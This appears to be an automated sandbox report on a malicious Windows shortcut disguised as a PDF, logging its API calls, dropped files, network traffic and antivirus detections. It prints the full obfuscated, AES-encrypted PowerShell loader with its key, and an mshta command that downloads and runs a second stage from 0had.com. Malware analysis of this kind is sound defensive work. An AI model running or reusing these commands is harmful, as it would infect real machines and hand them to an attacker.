NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02207000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02205000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aaa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aaf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 2376 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\SA162.pdf.lnk

Creates a suspicious process (5 events)

cmdline	powershell.exe -w 1 -ep Unrestricted -nop function dIcfq($EIHqQ){return -split ($EIHqQ -replace '..', '0x$& ')};$rQOkxJ = dIcfq('2E06F507D03C819EA24495C6B0C0F17251DE594DAE971052747249D184E6E5DF1DD3631C5728B8C332B3844379C90DD55A300B00590CED5C3E93CF314BD7CC2EE020C9CDF7E044B5C41487792AD76BF7C6FD16298D8BE725412174B9FC660BF878FEE68B736D6C6F2D92556C96BDC73F51E1603E96C5D231C0046F8BEC47500CB01EEF682F60DE3C346CF426DB8B0167685BFCEDE092CDB0E22473267706E82BB1A778C2D427F48CD5533F066E076D71647B3861B9C36277BF02A97521ACE70B0B187C5FD2CD4F1472F0C3F439AF098F08858C37AE9A0CB4DA4E9B397D0BD2D42AA40639B50AF43D962FB63FE91E5EF95C6A68D07B631480E072CA7BEAAD1EB40B6E74FECB61EE70DC5A8FA00F64B482D94CA0767D18225246D36A85E0AC788AB4C51486F451384539D7C1175EE26797A04FA67D04C978C0C555A81782032931F69B8F92B039281B4E22256D1DCFA0AF90FD767270C27BB92FA14445A7224EBC73B0D5F7D50107B183B58C9A876D88F76938152308F3A5A12331C2FAE0B5731C1110DD719A8DC62C247C2981DFC6F7FDECFF8D6CC66CB6A6141A5258DB50EC50A6A82537006403DCD7B84EC1F5131B505AA82344AF28838DE92B11873F1D6C82D8584F2431D5768024E4B7A77B4D35005A573DF556236B1C1B3FCF4115A5081ECB727F41A06838004D589C894119D157B4FBC6A026BBA1A0417C975D505CE5AFADC1B35006869B6910D97EB0AD66A6ECA680DFB922B8EA02284BAE324A3FA74984A300BB9E5E4F2E279E6F5528A6B1670812E5A7D6E30BFC1254BABC43ABDB2E2810DB1B6E5C3731ED0B68E1BBEF5EAF00C8F8D9F0FFB6E2D9C86441BF83596B12D8C1D1615418641DB81857A4E17BF0EE90472CC23F29AED3DDC539980682D2BAE287883757D8313BB489F3C364D0F0C716E59FB15D600E392B696B8B776C18EE347AA2CB26EF3FD809BAC3E4A12ABA247773506FABECC78F6CCAC0C4E1F0674900FC693CA82137026FF68CF0934DA5845710FEE54625EE1E1D34895E24AD7FC4DD8212428DC378372FAD6930C24637E24C8AD0E53828AC18410DDE7CE03F4B1AC1F9EECD70804E9A53FE17F1F1CB485944770F55E81789654E264BEF8FF403D24CC654BE2852475205928E6043EDF69AD60F31E5F5039C022DEFFAE35D1B5F87ED0A9195F9938B32F712333D3E166A20C1948CE34123285B3F4E823774885B597EB7A8AC160E81F020CA3D1A3DF05C59CD04F8A023380FE2E57305C3C60B393596B74D44B8011A9F6EBEA97950832E925B913AB79768B8882D8CA7FCE5C630331E222C0103CD79EC8BCB5E19E8970F1241182C85468019F5576E6E34C3835A00C8548670ED7FBDF98BF6F271BF707680D1EBFD7D6A38187A73FEC730CE976865D5407D76120ED2A450AFD837E959D1F27EFE7E35EF3A2115B02B75B35AC2D2FBFAF4290A7A29A0A750ACBF9393341FB90457F056187770A860FABAC5C0045FF70261675F56B68518C24FE186A5ACFD80D3726997E487390D694F069FADA849');$QsFeX = [System.Security.Cryptography.Aes]::Create();$QsFeX.Key = dIcfq('49585252535A526E7648576269484A4E');$QsFeX.IV = New-Object byte[] 16;$rXQrgilN = $QsFeX.CreateDecryptor();$FmtjJIyba = $rXQrgilN.TransformFinalBlock($rQOkxJ, 0, $rQOkxJ.Length);$sQblIgVuf = [System.Text.Encoding]::Utf8.GetString($FmtjJIyba);$rXQrgilN.Dispose();& $sQblIgVuf.Substring(0,3) $sQblIgVuf.Substring(3)
cmdline	"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage2"
cmdline	. mshta http://0had.com/stage2
cmdline	"C:\Windows\system32\mshta.exe" http://0had.com/stage2
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function dIcfq($EIHqQ){return -split ($EIHqQ -replace '..', '0x$& ')};$rQOkxJ = dIcfq('2E06F507D03C819EA24495C6B0C0F17251DE594DAE971052747249D184E6E5DF1DD3631C5728B8C332B3844379C90DD55A300B00590CED5C3E93CF314BD7CC2EE020C9CDF7E044B5C41487792AD76BF7C6FD16298D8BE725412174B9FC660BF878FEE68B736D6C6F2D92556C96BDC73F51E1603E96C5D231C0046F8BEC47500CB01EEF682F60DE3C346CF426DB8B0167685BFCEDE092CDB0E22473267706E82BB1A778C2D427F48CD5533F066E076D71647B3861B9C36277BF02A97521ACE70B0B187C5FD2CD4F1472F0C3F439AF098F08858C37AE9A0CB4DA4E9B397D0BD2D42AA40639B50AF43D962FB63FE91E5EF95C6A68D07B631480E072CA7BEAAD1EB40B6E74FECB61EE70DC5A8FA00F64B482D94CA0767D18225246D36A85E0AC788AB4C51486F451384539D7C1175EE26797A04FA67D04C978C0C555A81782032931F69B8F92B039281B4E22256D1DCFA0AF90FD767270C27BB92FA14445A7224EBC73B0D5F7D50107B183B58C9A876D88F76938152308F3A5A12331C2FAE0B5731C1110DD719A8DC62C247C2981DFC6F7FDECFF8D6CC66CB6A6141A5258DB50EC50A6A82537006403DCD7B84EC1F5131B505AA82344AF28838DE92B11873F1D6C82D8584F2431D5768024E4B7A77B4D35005A573DF556236B1C1B3FCF4115A5081ECB727F41A06838004D589C894119D157B4FBC6A026BBA1A0417C975D505CE5AFADC1B35006869B6910D97EB0AD66A6ECA680DFB922B8EA02284BAE324A3FA74984A300BB9E5E4F2E279E6F5528A6B1670812E5A7D6E30BFC1254BABC43ABDB2E2810DB1B6E5C3731ED0B68E1BBEF5EAF00C8F8D9F0FFB6E2D9C86441BF83596B12D8C1D1615418641DB81857A4E17BF0EE90472CC23F29AED3DDC539980682D2BAE287883757D8313BB489F3C364D0F0C716E59FB15D600E392B696B8B776C18EE347AA2CB26EF3FD809BAC3E4A12ABA247773506FABECC78F6CCAC0C4E1F0674900FC693CA82137026FF68CF0934DA5845710FEE54625EE1E1D34895E24AD7FC4DD8212428DC378372FAD6930C24637E24C8AD0E53828AC18410DDE7CE03F4B1AC1F9EECD70804E9A53FE17F1F1CB485944770F55E81789654E264BEF8FF403D24CC654BE2852475205928E6043EDF69AD60F31E5F5039C022DEFFAE35D1B5F87ED0A9195F9938B32F712333D3E166A20C1948CE34123285B3F4E823774885B597EB7A8AC160E81F020CA3D1A3DF05C59CD04F8A023380FE2E57305C3C60B393596B74D44B8011A9F6EBEA97950832E925B913AB79768B8882D8CA7FCE5C630331E222C0103CD79EC8BCB5E19E8970F1241182C85468019F5576E6E34C3835A00C8548670ED7FBDF98BF6F271BF707680D1EBFD7D6A38187A73FEC730CE976865D5407D76120ED2A450AFD837E959D1F27EFE7E35EF3A2115B02B75B35AC2D2FBFAF4290A7A29A0A750ACBF9393341FB90457F056187770A860FABAC5C0045FF70261675F56B68518C24FE186A5ACFD80D3726997E487390D694F069FADA849');$QsFeX = [System.Security.Cryptography.Aes]::Create();$QsFeX.Key = dIcfq('49585252535A526E7648576269484A4E');$QsFeX.IV = New-Object byte[] 16;$rXQrgilN = $QsFeX.CreateDecryptor();$FmtjJIyba = $rXQrgilN.TransformFinalBlock($rQOkxJ, 0, $rQOkxJ.Length);$sQblIgVuf = [System.Text.Encoding]::Utf8.GetString($FmtjJIyba);$rXQrgilN.Dispose();& $sQblIgVuf.Substring(0,3) $sQblIgVuf.Substring(3)

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\stage2[1]

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 19, 2024, 1:16 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -w 1 -ep Unrestricted -nop function dIcfq($EIHqQ){return -split ($EIHqQ -replace '..', '0x$& ')};$rQOkxJ = dIcfq('2E06F507D03C819EA24495C6B0C0F17251DE594DAE971052747249D184E6E5DF1DD3631C5728B8C332B3844379C90DD55A300B00590CED5C3E93CF314BD7CC2EE020C9CDF7E044B5C41487792AD76BF7C6FD16298D8BE725412174B9FC660BF878FEE68B736D6C6F2D92556C96BDC73F51E1603E96C5D231C0046F8BEC47500CB01EEF682F60DE3C346CF426DB8B0167685BFCEDE092CDB0E22473267706E82BB1A778C2D427F48CD5533F066E076D71647B3861B9C36277BF02A97521ACE70B0B187C5FD2CD4F1472F0C3F439AF098F08858C37AE9A0CB4DA4E9B397D0BD2D42AA40639B50AF43D962FB63FE91E5EF95C6A68D07B631480E072CA7BEAAD1EB40B6E74FECB61EE70DC5A8FA00F64B482D94CA0767D18225246D36A85E0AC788AB4C51486F451384539D7C1175EE26797A04FA67D04C978C0C555A81782032931F69B8F92B039281B4E22256D1DCFA0AF90FD767270C27BB92FA14445A7224EBC73B0D5F7D50107B183B58C9A876D88F76938152308F3A5A12331C2FAE0B5731C1110DD719A8DC62C247C2981DFC6F7FDECFF8D6CC66CB6A6141A5258DB50EC50A6A82537006403DCD7B84EC1F5131B505AA82344AF28838DE92B11873F1D6C82D8584F2431D5768024E4B7A77B4D35005A573DF556236B1C1B3FCF4115A5081ECB727F41A06838004D589C894119D157B4FBC6A026BBA1A0417C975D505CE5AFADC1B35006869B6910D97EB0AD66A6ECA680DFB922B8EA02284BAE324A3FA74984A300BB9E5E4F2E279E6F5528A6B1670812E5A7D6E30BFC1254BABC43ABDB2E2810DB1B6E5C3731ED0B68E1BBEF5EAF00C8F8D9F0FFB6E2D9C86441BF83596B12D8C1D1615418641DB81857A4E17BF0EE90472CC23F29AED3DDC539980682D2BAE287883757D8313BB489F3C364D0F0C716E59FB15D600E392B696B8B776C18EE347AA2CB26EF3FD809BAC3E4A12ABA247773506FABECC78F6CCAC0C4E1F0674900FC693CA82137026FF68CF0934DA5845710FEE54625EE1E1D34895E24AD7FC4DD8212428DC378372FAD6930C24637E24C8AD0E53828AC18410DDE7CE03F4B1AC1F9EECD70804E9A53FE17F1F1CB485944770F55E81789654E264BEF8FF403D24CC654BE2852475205928E6043EDF69AD60F31E5F5039C022DEFFAE35D1B5F87ED0A9195F9938B32F712333D3E166A20C1948CE34123285B3F4E823774885B597EB7A8AC160E81F020CA3D1A3DF05C59CD04F8A023380FE2E57305C3C60B393596B74D44B8011A9F6EBEA97950832E925B913AB79768B8882D8CA7FCE5C630331E222C0103CD79EC8BCB5E19E8970F1241182C85468019F5576E6E34C3835A00C8548670ED7FBDF98BF6F271BF707680D1EBFD7D6A38187A73FEC730CE976865D5407D76120ED2A450AFD837E959D1F27EFE7E35EF3A2115B02B75B35AC2D2FBFAF4290A7A29A0A750ACBF9393341FB90457F056187770A860FABAC5C0045FF70261675F56B68518C24FE186A5ACFD80D3726997E487390D694F069FADA849');$QsFeX = [System.Security.Cryptography.Aes]::Create();$QsFeX.Key = dIcfq('49585252535A526E7648576269484A4E');$QsFeX.IV = New-Object byte[] 16;$rXQrgilN = $QsFeX.CreateDecryptor();$FmtjJIyba = $rXQrgilN.TransformFinalBlock($rQOkxJ, 0, $rQOkxJ.Length);$sQblIgVuf = [System.Text.Encoding]::Utf8.GetString($FmtjJIyba);$rXQrgilN.Dispose();& $sQblIgVuf.Substring(0,3) $sQblIgVuf.Substring(3) filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 19, 2024, 1:16 p.m.	process_identifier: 1192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x04020000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 19, 2024, 1:16 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process mshta.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv April 19, 2024, 1:16 p.m.	buffer: HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 19 Apr 2024 04:19:10 GMT content-type: application/octet-stream content-length: 187372 last-modified: Wed, 10 Apr 2024 14:37:13 GMT etag: "6616a419-2dbec" accept-ranges: bytes MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $«ïëùÊïëùÊïëùÊüËîëùÊúËíëùÊýËúëùÊøËäëùÊïëøÊÛëùÊñËëëùÊÊîëùÊûËîëùÊRichïëùÊPELüºøà~0@ àD_@Á È@x`hoÐ T¼@Ä¼#`.text `.dataà0@À.idata@@@.didatP"@À.rsrcho`p$@@.reloc Ð@B received: 1024 socket: 868	1	1024	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	kgf!ð)7òÛÑ§°(~ÓtÙ(¼ æZK,?/5 ÀÀÀ À 28&ÿ 0had.com
Data sent	kgf!ð*f,ÂÓº&øù8¾nOØÜþÐ<DßÀ#j@/5 ÀÀÀ À 28&ÿ 0had.com
Data sent	kgf!ð*øéÆâOîØ!Wög¯aéûKÆ§¶ðªõªÄ/5 ÀÀÀ À 28&ÿ 0had.com
Data sent	kgf!ð+ZL66ÅÓ³¨ÅºiËÛ 1)mâ/5 ÀÀÀ À 28&ÿ 0had.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (18 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW April 19, 2024, 1:16 p.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 19, 2024, 1:16 p.m.	key_handle: 0x000002e0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

VIPRE	Heur.BZC.YAX.Pantera.41.18ED5265
Arcabit	Heur.BZC.YAX.Pantera.41.18ED5265
Symantec	CL.Downloader!gen111
ESET-NOD32	a variant of Generik.HGDTHWW
Avast	LNK:Agent-EK [Trj]
Kaspersky	HEUR:Trojan.Multi.Agent.gen
BitDefender	Heur.BZC.YAX.Pantera.41.18ED5265
MicroWorld-eScan	Heur.BZC.YAX.Pantera.41.18ED5265
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.41.18ED5265 (B)
FireEye	Heur.BZC.YAX.Pantera.41.18ED5265
Sophos	Troj/LnkRun-EZ
Google	Detected
MAX	malware (ai score=81)
Kingsoft	Win32.Troj.Unknown.a
ZoneAlarm	HEUR:Trojan.Multi.Agent.gen
GData	Heur.BZC.YAX.Pantera.41.18ED5265
Fortinet	LNK/Agent.ACX!tr
AVG	LNK:Agent-EK [Trj]

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 19, 2024, 1:16 p.m.	key_handle: 0x000002e0 regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
